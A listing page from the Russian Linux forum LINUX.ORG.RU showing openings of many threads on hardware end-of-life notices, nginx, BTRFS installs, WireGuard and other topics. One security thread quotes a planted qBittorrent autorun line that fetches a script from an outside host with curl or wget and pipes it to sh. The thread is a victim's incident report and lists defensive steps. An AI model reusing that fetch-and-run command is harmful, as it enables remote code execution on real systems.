LINUX.ORG.RU

Форум

Активные теги:

, , , , , , , , , , , , , ,

Форум — Linux-hardware

Apacer прекращает выпуск производства чипов SLC и MLC (SSD)

Официальное объявление о снятии с производства чипов SLC и MLC, а как следствие твердотельных накопителей типа архитектуры SLC и MLC. Текст письма от производителя:

«Компания Apacer настоящим объявляет об окончании срока службы (EOL) всех промышленных продуктов Apacer, основанных на технологиях SLC и MLC, в связи с окончанием срока службы новейших моделей SLC 25 нм и MLC 25 нм всеми основными производителями микросхем (Samsung, Kioxia, Micron, SK Hynix).

Apacer настоятельно рекомендует своим клиентам перейти на альтернативное решение, представляющее собой новейшие микросхемы 3D TLC NAND.

Альтернативные решения прошли все проверки и квалификационные тесты без каких-либо проблем с функциональностью или совместимостью.»

Michail Kogan

!!!Модерам - копия письма пришла в нашу контору (см.вложение), поэтому ссылок не будет. Нужна ли такая новость сами решайте.

Перемещено CrX из hardware

, ,

NeTC
()
Форум — Linux-hardware

Apacer прекращает выпуск ОЗУ стандарта DDR3

Официальное объявление о прекращении производства памяти стандарта DDR3. Текст письма от производителя:

«Настоящим компания Apacer объявляет о выпуске модулей памяти DDR3 DRAM в соответствии с требованиями EOL в связи с прекращением производства микросхем памяти DDR3 всеми основными производителями.

Соответствующие продукты будут выведены из эксплуатации соответствующим образом.»

Michail Kogan

!!!Модерам - копия письма пришла в нашу контору (см.вложение), поэтому ссылок не будет. Нужна ли такая новость сами решайте.

Перемещено CrX из hardware

, ,

NeTC
()
Форум — Desktop

Firejail

Здравствуйте. Когда я запускаю программу через firejail —x11=xorg в дочерних окнах этой программы не работает клавиатура. Как это можно исправить ?

pzeltin
()
Форум — Admin

Nginx ERR_CONNECTION_RESET

Когда открываешь сайт в хроме в режиме инкогнито, то первый запрос висит около 30 сек. и потом ERR_CONNECTION_RESET. Повторная перезагрузка страницы моментально все загружает.

Снова закрываю окно, открываю в инкогнито - та же самая проблема.

Бывает по другому - не грузятся js скрипты - тоже ERR_CONNECTION_RESET

Бывает скрипт загрузится через 40 сек., сервер отдаст 200 код, но все равно браузер ERR_CONNECTION_RESET выдает

Бывает JS скрипт грузит 10 секунд

HTTP/1.1 200 OK
Server: Angie
Date: Thu, 23 Apr 2026 05:19:27 GMT
Content-Type: application/javascript
Last-Modified: Fri, 20 Mar 2026 03:13:15 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"69bcbb4b-2953ee"
Cache-Control: public, max-age=100000
Content-Encoding: gzip

Пробовал отключать chunked_transfer_encoding off

Есть особенность: виртхост - 2 домена. Первый - основной работает без проблем, а со вторым такие проблемы. В логах ничего.

С первого раза не запускается сайт. Если загружать не браузером - то любой запрос с 1 раза проходит нормально - вообще без проблем.
Пробовал с хрома, оперы, никаких расширений нет. ВПН нет. Симптомы вообще не понятны, в какую сторону копать

, , , ,

gobot
()
Форум — Linux-install

Установка Debian на subvolume BTRFS

Вновь возвращаюсь к теме

Установка Debian «по-умолчанию», поставила директорию /var в отдельный раздел, и APT, после года установок и работы, стал «вылетать» с ошибкой нехватки места: стало ясно что надо ставить системные директории в отдельные места, но создавать для того отдельные разделы с жесткими границами размеров не захотелось, потому обратился к subvolume на BTRFS.

1. Создал раметку:
Device             Start       End   Sectors   Size Type
/dev/nvme0n1p1      2048    499711    497664   243M EFI System
/dev/nvme0n1p2    499712    999423    499712   244M Linux filesystem
/dev/nvme0n1p3 495235072 500117503   4882432   2.3G Linux swap
/dev/nvme0n1p4    999424 495235071 494235648 235.7G Linux filesystem

где 1 раздел - это собственно «Системный раздел EFI», 2 раздел - это загрузчик grub, который я не сумел переместить в subvolume BTRFS на 4 разделе

1. Далее в текстовом инсталляторе Debian, после завершения создания раздела, и перед установкой системы, вышел в консоль, и создал подтома BTRFS
  2. Размонтировал EFI,Grub и root-разделы,
  3. Примонтировал раздел с корневой директорией в /mnt. cd /mnt
  4. Cоздаю подтома: btrfs subvolume create {home,var,opt,usr/local,srv,tmp,boot/grub2/x86_64-efi,.snapshots}
  5. Монтирую сначала efi: mount /dev/nvme0n1p1 /target/boot/efi
  6. Монтирую все созданные ранее subvoulume одной и той же командой: mount -o rw,noatime,compress=lzo,space_cache,subvolid=<..вывод из subvolume list> /target/{home,var,opt,usr/localmsrv,tmp,boot/grub2/x86_64-efi,.snapshots}

Далее идёт обычная установка, в результате получается такой /etc/fstab:

# / was on /dev/nvme0n1p4 during installation
UUID=........-....-....-....-........... /               btrfs   defaults,subvol=@rootfs 0       0
UUID=.......-....-....-....-............ /home           btrfs   defaults,subvol=home 0       0
UUID=.......-....-....-....-............ /var            btrfs   defaults,subvol=var 0       0
UUID=.......-....-....-....-............ /opt            btrfs   defaults,subvol=opt 0       0
UUID=.......-....-....-....-............ /usr/local      btrfs   defaults,subvol=usr/local  0       0
UUID=.......-....-....-....-............ /srv            btrfs   defaults,subvol=srv 0       0
UUID=.......-....-....-....-............ /tmp            btrfs   defaults,subvol=tmp 0       0
UUID=.......-....-....-....-............ /boot/grub2/x86_64-efi               btrfs   defaults,subvol=boot/grub2/x86_64-efi 0       0
UUID=.......-....-....-....-............ /.snapshots     btrfs   defaults,subvol=.snapshots 0       0

В итоге не грузятся именно те подтома, которые занёс на btrfs.

[FAILED] Failed to mount home.mount - /home.
[DEPEND] Dependency failed for local-fs target - Local File Systems.
[FAILED] Failed to mount \x2esnapshots.mount - /.snapshots.
[FAILED] Failed to mount opt.mount - /opt.
[FAILED] Failed to mount srv.mount - /srv.
[FAILED] Failed to mount tmp.mount - /tmp.
[FAILED] Failed to mount usr-local.mount - /usr/local.
[FAILED] Failed to mount var.mount - /var.
[DEPEND] Dependency failed for systemd-tpm2-setup.service - TPM SRK
Setup.
[DEPEND] Dependency failed for systemd-random-seed.service - Load/Save OS
Random [DEPEND] Dependency failed for systemd-journal-flush.service - Flush Journal to
[DEPEND] Dependency failed for apparmor.service - Load AppArmor profiles.
[DEPEND] Dependency failed for systemd-pstore.service - Platform Persistent
Stor
[FAILED] Failed to mount var.mount - /var.
[DEPEND] Dependency failed for systemd-rfkill.socket - Load/Save RF Kill
Switch
[FAILED] Failed to mount boot-grub2-x86_64\x2defi.mount - /boot/grub2/x86_64-efi
You are in emergency mode. After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, or "exit"
to continue bootup.
Cannot open access to console, the root account is locked.
See sulogin(8) man page for more details.
Press Enter to continue.

При том, что в ‘journalctl -xb’ - вроде, всё в порядке: там только «session closed for user root».

Что я делаю не так ? Очень попрошу без злословий, просто объясните по проще, желательно с примерами :)

,

moskvich
()
Форум — Talks

Ностальгия

Предлагаю к просмотру вот это видео начала 2010-х: https://youtu.be/pY9t4RSLFN4?is=CA3b4YoQ4YVgbD6u

,

dsalin
()
Форум — Talks

«Новый» вирус под линукс. Для дектопа ....

«Новый» вирус под линукс.. Похоже начинают осваивать рабочие АРМы под линуксом. «Привет» Астре !

Новый вредонос GoGra для Linux использует API Microsoft Graph для обеспечения связи.

Сотрудники Symantec проанализировали образцы нового бэкдора GoGra для Linux, полученные с VirusTotal, и обнаружили, что первоначальный доступ осуществляется путем обмана и запуска ELF-бинарных файлов, замаскированных под PDF-файлы, в основном полученые по почте.

На начальном этапе атаки вредоносный дроппер на основе Go развертывает полезную нагрузку i386, обеспечивая постоянное присутствие в системе через systemd и запись автозапуска XDG, выдающую себя за легитимный системный монитор Conky для Linux и BSD.

https://www.security.com/blog-post/harvester-new-linux-backdoor-gogra

,

paulbych
()
Форум — Искусственный Интеллект

22 апреля

Вбил под вечер в гугл запрос «22 апреля». Выдача AI:

• Международный день Матери-Земли (International Mother Earth Day): Экологический праздник, призывающий беречь планету.

• Международный день секретаря (Administrative Professionals Day): Чествование административных работников.

• День рождения В.И. Ленина: Историческая дата, часто отмечаемая в коммунистической традиции.

• День старого программиста: Неофициальный праздник, часто привязываемый к этой дате.

Что-то в этом наборе есть. Ура, товарищи.

Перемещено hobbit из talks

, ,

x22
()
Форум — Talks

Почему нет для джаббера клиента с удобством телеграма?

Если бы для джаббера был такой же клиент красивый как телеграм или ватсап, то я думаю все эти плохие говорилки, которые требуют номер телефона при регистрации (с технической точки зрения совершенно не нужный) - больше бы никто не использовал.

Меня мучает вопрос почему до сих пор такого клиента нет? На уровне своих знаний я не могу дать себе достаточно убедительный ответ на этот вопрос.

У меня есть свободное время и несколько коллег, которые могли бы за пару лет сделать что-то подобное и выложить на github. Не замесят ли нас агенты какой-то службы, которая, как мне кажется, не даёт никому выпустить такой клиент (на правах версии).

Не написал эту тему в Talks, так как там стоит лимит на репутацию.

Если я написал что-то не то - удаляйте сообщение, я жаловаться не буду.

Перемещено CrX из general

, ,

Ultimenti
()
Форум — Talks

Не знаю, вендекапец ли это, но

https://codeberg.org/hails/wsl9x

Windows 9x Subsystem for Linux.

WSL9x runs a modern Linux kernel (6.19 at time of writing) cooperatively inside the Windows 9x kernel, enabling users to take advantage of the full suite of capabilities of both operating systems at the same time, including paging, memory protection, and pre-emptive scheduling. Run all your favourite applications side by side - no rebooting required!

Proudly written without AI.

скриншотэ

, ,

sn4il
()
Форум — General

Как gpg записать в файл без вывода на экран

Я например пишу gpg -d ..... 》file как точчно должно быть?

zte
()
Форум — Linux-hardware

Контроллер не видит дисков после включения питания

Контроллер (pcie) Adaptec 5405 после включения питания не видит дисков

Ошибка
one or more drivers are either miss or not responding

После перезагрузки все нормально (ctrl+alt+del). Если выдернуть шнур питания и снова включить - не видит снова.

,

gobot
()
Форум — Security

Мой LXC ломанули 0_о

Всем привет!

Внутри сервера Proxmox был LXC для qBittorrent, через который качал всякое. Внезапно обнаружил, что в файле: /root/.config/qBittorrent/qBittorrent.conf:

[AutoRun]
  OnTorrentAdded\Enabled=true
  OnTorrentAdded\Program=sh -c "(curl -s http://0x1x2x3.top || wget -qO - http://0x1x2x3.top) | sh"
  enabled=true
  program="sh -c \"echo <base64> | base64 -d | sh\""

Кто-то прописал в «выполнить при добавлении торрента» скрипт, который скачивает и запускает шелл с http://0x1x2x3.top. Хз может какой-то криптомайнер.

Проблема в том, что mount point был смонтирован к пулу с моими файлами. Могла ли эта гадость дальше пролезть и что можно сделать кроме проверки ClamAV?

ЧТО В ИТОГЕ:

1. Поставил на входе на NGINX ограничение по GEOIP
  2. Убил инфицированный контейнер
  3. Проверил mount point через ClamAV, новых файлов не нашел
  4. Стал использовать CrowdSec
  5. Думаю над VPN для внутренних сервисов

,

AntonyRF
()
Форум — Admin

UDP Hole Punching

Привет. Я краем уха слышал, что wireguard помогает делать UDP Hole Punching без всяких приседаний.

Представим, что есть сервер с белым IP (СБ), клиент_1 за натом (К1) и клиент_2 за натом (К2). Нужно установить прямое соединение между К1 и К2. В идеале, было бы просто слать на адрес в впн сети К1->К2, и оно само там разбирается, что лучше слать пакеты не через сервер. Но это так не работает, пакеты идут через сервер.

ОК, тогда вопрос 2 - если настроена ВПН ВГ сеть, отсылают ли клиенты друг другу специально пакеты для поддержания udp портов открытыми, чтобы можно было слать пакеты от одного клиента другому? Или пакеты идут только сервер<->клиент и ВГ ничем здесь не помогает?

Если ответ на последний вопрос «да». На десктопе я как-нибудь разберусь, К2 запишет свой адрес в DDNS, в К1 подниму ВГ, а дефолтным шлюзом сделаю К2 (запись в DDNS), и буду слать данные напрямую от К1 к К2. А что если К1 - андройд/айфон, там вообще есть варианты установить дефолтный шлюз? Я так посмотрел, вижу только для статический настроек, мне же нужно задать лишь шлюз

, , , ,

kvpfs_2
()
Форум — Admin

App Store

День добрый, коллеги.

Подскажите, пожалуйста, номера AS, с которых сабж и iCloud отгружают контент.

,

s140680
()
Форум — Talks

Да что ж не так с этим нейросетями?!

Столкнулся с простой вроде бы задачей. У меня есть картинка с текстом, хотелось чтобы нейросетка написала возле каждого слова размер шрифта в пикселях. Они все отказываются. Несмотря на то что способны вынуть все слова и указать у каждого из них размер пикселях, но добавить ещё один слой с нужными обозначениями на картинку они не могут. Чем можно такое сделать автоматически?

ЗЫ. Нанобанана почти смогла.

бям, ,

ya-betmen
()
Форум — Talks

А вы уважаете права копирайтеров?

Пришла печальная новость для читателей киндл книг из ОС Линукс (и, видимо, Андроид тоже). С лета Амазон прекращает поддержку Киндл Аппа для ПК. Вместо этого старого аппа Амазон разрабатывает новый апп, который будет доступен только для виндоус11 и только из МС маркета. Якобы, при использовании текущего Аппа (в Линуксе, что ли?) контент крали и пиратили.

С одной стороны, я это поддерживаю, потому что пиратство подрывает желание потенциальных авторов писать книги. С другой стороны, как теперь быть легальным читателям контента с ОС Линукс?

Может быть, киндл-облако, по-прежнему будет работать из браузера на любой ОС? Очень надеюсь на это…

seiken
()
Форум — Linux-hardware

apc smart sc450 проблема с калибровкой

Есть старенький ИБП (2005 г.). В нем сдохла очередная батарейка и после этого он стал самопроизвольно отключаться.
Сначала это было редкое явление, но через пару недель интервал между отключениями стал меньше часа.

Заменили все электролиты. Часть электролитов вместо 22 мкф стала 12-15 мкф.

Результат: все работает кроме калибровки.
Если подключить нагрузку и отрубить питание, то он держит нагрузку в течении длительного времени (нагрузка 110Вт в течении 40 минут).
Напряжение на батареи в режиме разряда показывается корректно.

Тестовый разряд батареи проводили дважды.

Но если запустить калибровку, то она завершается в течении 1-2 минут.

Очень странно ведет себя параметр «Runtime left»: по мере заряда батареи он увеличивается, а потом начинает уменьшаться :-(

Есть ли способ откалибровать его?

,

vel
()
Форум — Security

В ядро Linux 7.1 были включены обновления для JFS

Оно шевелится! :-) По результатам выявленных с помощью санитайзера неопределённого поведения UBSAN добавлены проверки для предотвращения выходов индексов за границы и переполнения указателей, устранено предупреждение компилятора, а также реализована принудительная загрузка по UUID файловой системы во время монтирования. Напомню, что еще в в начале 2023 года известный разработчик ядра Кристоф Хеллвиг (Christoph Hellwig) поднимал вопрос о возможном удалении JFS из основного ядра Linux.

, , ,

splinter
()
Форум — Admin

Не могу найти/понять причину ошибки в команде bash

Пытаюсь запустить iVentoy при старте системы пользуясь системой «Автозагрузкой приложений» утверждается что достаточно в строку добавить команду и как бы должно все работать. Но обнаружил что даже в терминале такая команда как написано ниже не работает:

gres@ACER:~$ sudo bash ~/Downloads/iventoy-1.0.25/iventoy.sh -R start
[sudo] password for gres:     
env: ‘/home/gres/lib/iventoy’: No such file or directory
iventoy start FAILED

Однако если войти в папку то проблема исчезает т.е.:

gres@ACER:~/Downloads/iventoy-1.0.25$ sudo bash ~/Downloads/iventoy-1.0.25/iventoy.sh -R start
iventoy start SUCCESS PID=12413

Please open your browser and visit http://127.0.0.1:26000 or http://x.x.x.x:26000 (x.x.x.x is any valid IP address)

Однако если поменять команду в «Автозагрузке приложений» на следующую то в отличии от терминала (как это скопировано ниже) ничего не происходит:

gres@ACER:~$ cd ~/Downloads/iventoy-1.0.25 && sudo bash iventoy.sh -R start
iventoy start SUCCESS PID=13320

Please open your browser and visit http://127.0.0.1:26000 or http://x.x.x.x:26000 (x.x.x.x is any valid IP address)

Не могу понять где ошибка. Что нужно вводить в поле приложений для «Автозагрузки приложения», чтобы автоматом запускался iVentoy. Пока не пробовал, но есть у меня суровые подозрения, что и в других способах автозагрузки, через запись в скрипты для системы например /etc/systemd/system/ я не смогу ничего сделать.

Перемещено hobbit из general

gres
()

RSS подписка на новые темы